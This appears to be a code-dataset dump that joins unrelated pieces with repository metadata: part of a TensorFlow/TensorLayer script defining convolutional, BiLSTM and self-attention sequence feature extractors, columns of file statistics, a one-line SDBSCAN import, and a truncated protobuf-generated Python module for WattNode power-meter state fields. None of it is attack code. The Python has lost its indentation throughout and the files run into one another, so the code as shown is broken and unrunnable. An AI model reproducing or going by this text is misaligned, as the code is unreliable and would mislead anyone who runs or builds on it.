feature2 = Conv1d(embedding, 300, int(kernels[1]), stride = 1, dilation_rate = 2, act = None, name = 'conv_8_2') # 500
feature2 = tl.layers.BatchNormLayer(feature2, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='feature2_bn')
feature2 = PReluLayer(feature2, channel_shared = True, name='conv1_2_relu')
'''
if config.TRAIN.DROPOUT:
feature2 = DropoutLayer(feature2, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features2', is_fix = True)
'''
feature3 = Conv1d(embedding, 300, int(kernels[2]), stride = 1, dilation_rate = 4, act = None, name = 'conv_16_2') # 500
feature3 = tl.layers.BatchNormLayer(feature3, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
feature3 = PReluLayer(feature3, channel_shared = True, name='conv1_3_relu')
'''
if config.TRAIN.DROPOUT:
feature3 = DropoutLayer(feature3, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features3', is_fix = True)
'''
features = ConcatLayer([feature1, feature2, feature3], name = 'concat')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3')
con_features = PReluLayer(features, channel_shared = True, name='conv2a_relu')
'''
if config.TRAIN.DROPOUT:
con_features = DropoutLayer(con_features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features4', is_fix = True)
'''
features = Conv1d(con_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250_c') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3_c')
features = PReluLayer(features, channel_shared = True, name='conv2a_relu_c')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuress1', is_fix = True)
'''
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn4')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuresss2', is_fix = True)
'''
features = ElementwiseLayer([features, con_features], tf.add, name = 'elem_add')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_125') # 125
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn5')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuresss3', is_fix = True)
'''
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacking 3 bi-directiona,l lstm here
'''
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
features = SelfAttentionLayer(features, 8 , 128,name='self-attention')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi2')
#
'''
def my_rev(inputs):
return tf.reverse(inputs, [1])
rev_features = LambdaLayer(features, my_rev, name ='reverse')
rev_features = SelfAttentionLayer(rev_features, 8 , 128,name='rev_self-attention')
#rev_features = TimeDistributedLayer(rev_features, layer_class=tl.layers.DenseLayer, args={'n_units':50, 'name':'dense_rev'}, name='time_dense_rev')
#DenseLayer(hidden, 2, act = None, name = 'predicting')
features = SelfAttentionLayer(features, 8 , 128,name='self-attention')
#rev_features = TimeDistributedLayer(rev_features, layer_class=tl.layers.DenseLayer, args={'n_units':50, 'name':'dense1'}, name='time_dense')
features = ConcatLayer([features, rev_features], name = 'attention_concat')
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features, feature1.outputs
def AttentionSeqs(t_sequences, name, is_train= True, reuse = False):
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
embedding = EmbeddingInputlayer(sequences, 5, 32)
def my_rev(inputs):
return tf.reverse(inputs, [1])
def pe(inputs):
return Position_Embedding(inputs, 32)
rev_features = LambdaLayer(embedding, my_rev, name ='reverse')
rev_pos_embed = LambdaLayer(rev_features, pe, name='rev_position-embedding')
rev_features = ConcatLayer([rev_features, rev_pos_embed], name = 'rev_embedding_concat')
for i in range(6):
rev_features = SelfAttentionLayer(rev_features, 8 , 128,name='rev_self-attention%d'%i)
#rev_features = TimeDistributedLayer(rev_features, layer_class=tl.layers.DenseLayer, args={'n_units':50, 'name':'dense1'}, name='time_dense')
rev_features = Conv1d(rev_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = tf.nn.relu, name = 'rev_conv_125_%d'%i)
pos_embed = LambdaLayer(embedding, pe, name='position-embedding')
features = ConcatLayer([pos_embed, embedding], name = 'embedding_concat')
for i in range(6):
features = SelfAttentionLayer(features, 8 , 128,name='self-attention%d'%i)
#rev_features = TimeDistributedLayer(rev_features, layer_class=tl.layers.DenseLayer, args={'n_units':50, 'name':'dense1'}, name='time_dense')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = tf.nn.relu, name = 'conv_125_%d'%i)
features = ConcatLayer([rev_features, features], name = 'embedding_concat')
return features, features.outputs
def sharedFeatureExtractor_nodropout(t_sequences, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
kernels = config.TRAIN.KERNEL.split('_')
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
#return sequences, sequences.outputs
#return sequences
# user larger kernel size for the first layer
feature1 = Conv1d(sequences, 300, int(kernels[0]), stride = 1, dilation_rate = 1, act = None, name = 'conv_500') # 500
feature1 = tl.layers.BatchNormLayer(feature1, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
feature1 = PReluLayer(feature1, channel_shared = True, name='conv1_relu')
# used to simulate gapped kmer
feature2 = Conv1d(sequences, 300, int(kernels[1]), stride = 1, dilation_rate = 2, act = None, name = 'conv_8_2') # 500
feature2 = tl.layers.BatchNormLayer(feature2, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='feature2_bn')
feature2 = PReluLayer(feature2, channel_shared = True, name='conv1_2_relu')
feature3 = Conv1d(sequences, 300, int(kernels[2]), stride = 1, dilation_rate = 4, act = None, name = 'conv_16_2') # 500
feature3 = tl.layers.BatchNormLayer(feature3, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
feature3 = PReluLayer(feature3, channel_shared = True, name='conv1_3_relu')
features = ConcatLayer([feature1, feature2, feature3], name = 'concat')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3')
con_features = PReluLayer(features, channel_shared = True, name='conv2a_relu')
features = Conv1d(con_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250_c') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3_c')
features = PReluLayer(features, channel_shared = True, name='conv2a_relu_c')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn4')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = ElementwiseLayer([features, con_features], tf.add, name = 'elem_add')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_125') # 125
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn5')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacking 3 bi-directiona,l lstm here
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi2')
#
features = SelfAttentionLayer(features, 8 , 128,name='self-attention')
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features, feature1.outputs
if __name__ == '__main__':
'''
test model building
'''
print('model testing!')
sequences = tf.placeholder(tf.float32, [None, config.TRAIN.TIME_STEPS, config.TRAIN.EMBED_DIM])
selecting,_ = sharedFeatureExtractor(sequences,'extrator')
category= classifier(selecting, 'classifier')
#print(category.all_params)
print('printing layers')
print(category.all_params)
#category.print_params(False)
| 58.203016
| 191
| 0.650814
| 6,283
| 50,171
| 4.988541
| 0.051727
| 0.036627
| 0.033309
| 0.034394
| 0.885046
| 0.877772
| 0.8697
| 0.858469
| 0.849982
| 0.836901
| 0
| 0.033225
| 0.236332
| 50,171
| 861
| 192
| 58.270616
| 0.784831
| 0.179347
| 0
| 0.615804
| 0
| 0
| 0.066738
| 0.000694
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049046
| false
| 0.00545
| 0.024523
| 0.010899
| 0.125341
| 0.008174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
768ecf7fe5e4ea51a244b9131d649e7996b3a191
| 39
|
py
|
Python
|
__init__.py
|
tommylee3003/SDBSCAN
|
b7b1f5f5aacdd2bdd69935ede58bd61cc6121a9c
|
[
"MIT"
] | 3
|
2020-08-26T07:45:35.000Z
|
2021-05-30T07:15:52.000Z
|
__init__.py
|
tommylee3003/SDBSCAN
|
b7b1f5f5aacdd2bdd69935ede58bd61cc6121a9c
|
[
"MIT"
] | null | null | null |
__init__.py
|
tommylee3003/SDBSCAN
|
b7b1f5f5aacdd2bdd69935ede58bd61cc6121a9c
|
[
"MIT"
] | 2
|
2021-02-15T07:00:34.000Z
|
2021-08-04T14:56:53.000Z
|
from .sdbscan import SDBSCAN, sdbscan
| 13
| 37
| 0.794872
| 5
| 39
| 6.2
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 39
| 2
| 38
| 19.5
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
769587de87f5ff3e55f9d39633a93aa40aea45d6
| 31,960
|
py
|
Python
|
python/pyxbos/pyxbos/wattnode_pb2.py
|
anandkp92/xboswave
|
f7d8a72cde048a21422f9d0838374b83b1b6a256
|
[
"BSD-3-Clause"
] | null | null | null |
python/pyxbos/pyxbos/wattnode_pb2.py
|
anandkp92/xboswave
|
f7d8a72cde048a21422f9d0838374b83b1b6a256
|
[
"BSD-3-Clause"
] | null | null | null |
python/pyxbos/pyxbos/wattnode_pb2.py
|
anandkp92/xboswave
|
f7d8a72cde048a21422f9d0838374b83b1b6a256
|
[
"BSD-3-Clause"
] | 3
|
2019-02-05T23:01:09.000Z
|
2019-03-25T22:22:10.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: wattnode.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from . import nullabletypes_pb2 as nullabletypes__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='wattnode.proto',
package='xbospb',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x0ewattnode.proto\x12\x06xbospb\x1a\x13nullabletypes.proto\"\x93\x10\n\rWattnodeState\x12!\n\tEnergySum\x18\x01 \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0c\x45nergyPosSum\x18\x02 \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0b\x45nergySumNR\x18\x03 \x01(\x0b\x32\x0e.xbospb.Double\x12&\n\x0e\x45nergyPosSumNr\x18\x04 \x01(\x0b\x32\x0e.xbospb.Double\x12 \n\x08PowerSum\x18\x05 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06PowerA\x18\x06 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06PowerB\x18\x07 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06PowerC\x18\x08 \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tVoltAvgLN\x18\t \x01(\x0b\x32\x0e.xbospb.Double\x12\x1d\n\x05VoltA\x18\n \x01(\x0b\x32\x0e.xbospb.Double\x12\x1d\n\x05VoltB\x18\x0b \x01(\x0b\x32\x0e.xbospb.Double\x12\x1d\n\x05VoltC\x18\x0c \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tVoltAvgLL\x18\r \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06VoltAB\x18\x0e \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06VoltBC\x18\x0f \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06VoltAC\x18\x10 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1c\n\x04\x46req\x18\x11 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x45nergyA\x18\x12 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x45nergyB\x18\x13 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x45nergyC\x18\x14 \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyPosA\x18\x15 \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyPosB\x18\x16 \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyPosC\x18\x17 \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0c\x45nergyNegSum\x18\x18 \x01(\x0b\x32\x0e.xbospb.Double\x12&\n\x0e\x45nergyNegSumNR\x18\x19 \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyNegA\x18\x1a \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyNegB\x18\x1b \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyNegC\x18\x1c \x01(\x0b\x32\x0e.xbospb.Double\x12%\n\rEnergyReacSum\x18\x1d \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0b\x45nergyReacA\x18\x1e \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0b\x45nergyReacB\x18\x1f \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0b\x45nergyReacC\x18 \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0c\x45nergyAppSum\x18! \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyAppA\x18\" \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyAppB\x18# \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nEnergyAppC\x18$ \x01(\x0b\x32\x0e.xbospb.Double\x12&\n\x0ePowerFactorAvg\x18% \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0cPowerFactorA\x18& \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0cPowerFactorB\x18\' \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0cPowerFactorC\x18( \x01(\x0b\x32\x0e.xbospb.Double\x12$\n\x0cPowerReacSum\x18) \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nPowerReacA\x18* \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nPowerReacB\x18+ \x01(\x0b\x32\x0e.xbospb.Double\x12\"\n\nPowerReacC\x18, \x01(\x0b\x32\x0e.xbospb.Double\x12#\n\x0bPowerAppSum\x18- \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tPowerAppA\x18. \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tPowerAppB\x18/ \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tPowerAppC\x18\x30 \x01(\x0b\x32\x0e.xbospb.Double\x12 \n\x08\x43urrentA\x18\x31 \x01(\x0b\x32\x0e.xbospb.Double\x12 \n\x08\x43urrentB\x18\x32 \x01(\x0b\x32\x0e.xbospb.Double\x12 \n\x08\x43urrentC\x18\x33 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1e\n\x06\x44\x65mand\x18\x34 \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tDemandMin\x18\x35 \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tDemandMax\x18\x36 \x01(\x0b\x32\x0e.xbospb.Double\x12!\n\tDemandApp\x18\x37 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x44\x65mandA\x18\x38 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x44\x65mandB\x18\x39 \x01(\x0b\x32\x0e.xbospb.Double\x12\x1f\n\x07\x44\x65mandC\x18: \x01(\x0b\x32\x0e.xbospb.Double\x12\x0c\n\x04time\x18; \x01(\x04\x62\x06proto3')
,
dependencies=[nullabletypes__pb2.DESCRIPTOR,])
_WATTNODESTATE = _descriptor.Descriptor(
name='WattnodeState',
full_name='xbospb.WattnodeState',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='EnergySum', full_name='xbospb.WattnodeState.EnergySum', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosSum', full_name='xbospb.WattnodeState.EnergyPosSum', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergySumNR', full_name='xbospb.WattnodeState.EnergySumNR', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosSumNr', full_name='xbospb.WattnodeState.EnergyPosSumNr', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerSum', full_name='xbospb.WattnodeState.PowerSum', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerA', full_name='xbospb.WattnodeState.PowerA', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerB', full_name='xbospb.WattnodeState.PowerB', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='PowerC', full_name='xbospb.WattnodeState.PowerC', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltAvgLN', full_name='xbospb.WattnodeState.VoltAvgLN', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltA', full_name='xbospb.WattnodeState.VoltA', index=9,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltB', full_name='xbospb.WattnodeState.VoltB', index=10,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltC', full_name='xbospb.WattnodeState.VoltC', index=11,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltAvgLL', full_name='xbospb.WattnodeState.VoltAvgLL', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltAB', full_name='xbospb.WattnodeState.VoltAB', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltBC', full_name='xbospb.WattnodeState.VoltBC', index=14,
number=15, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='VoltAC', full_name='xbospb.WattnodeState.VoltAC', index=15,
number=16, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='Freq', full_name='xbospb.WattnodeState.Freq', index=16,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyA', full_name='xbospb.WattnodeState.EnergyA', index=17,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyB', full_name='xbospb.WattnodeState.EnergyB', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyC', full_name='xbospb.WattnodeState.EnergyC', index=19,
number=20, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosA', full_name='xbospb.WattnodeState.EnergyPosA', index=20,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosB', full_name='xbospb.WattnodeState.EnergyPosB', index=21,
number=22, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyPosC', full_name='xbospb.WattnodeState.EnergyPosC', index=22,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegSum', full_name='xbospb.WattnodeState.EnergyNegSum', index=23,
number=24, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegSumNR', full_name='xbospb.WattnodeState.EnergyNegSumNR', index=24,
number=25, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegA', full_name='xbospb.WattnodeState.EnergyNegA', index=25,
number=26, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegB', full_name='xbospb.WattnodeState.EnergyNegB', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyNegC', full_name='xbospb.WattnodeState.EnergyNegC', index=27,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyReacSum', full_name='xbospb.WattnodeState.EnergyReacSum', index=28,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyReacA', full_name='xbospb.WattnodeState.EnergyReacA', index=29,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyReacB', full_name='xbospb.WattnodeState.EnergyReacB', index=30,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='EnergyReacC', full_name='xbospb.WattnodeState.EnergyReacC', index=31,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
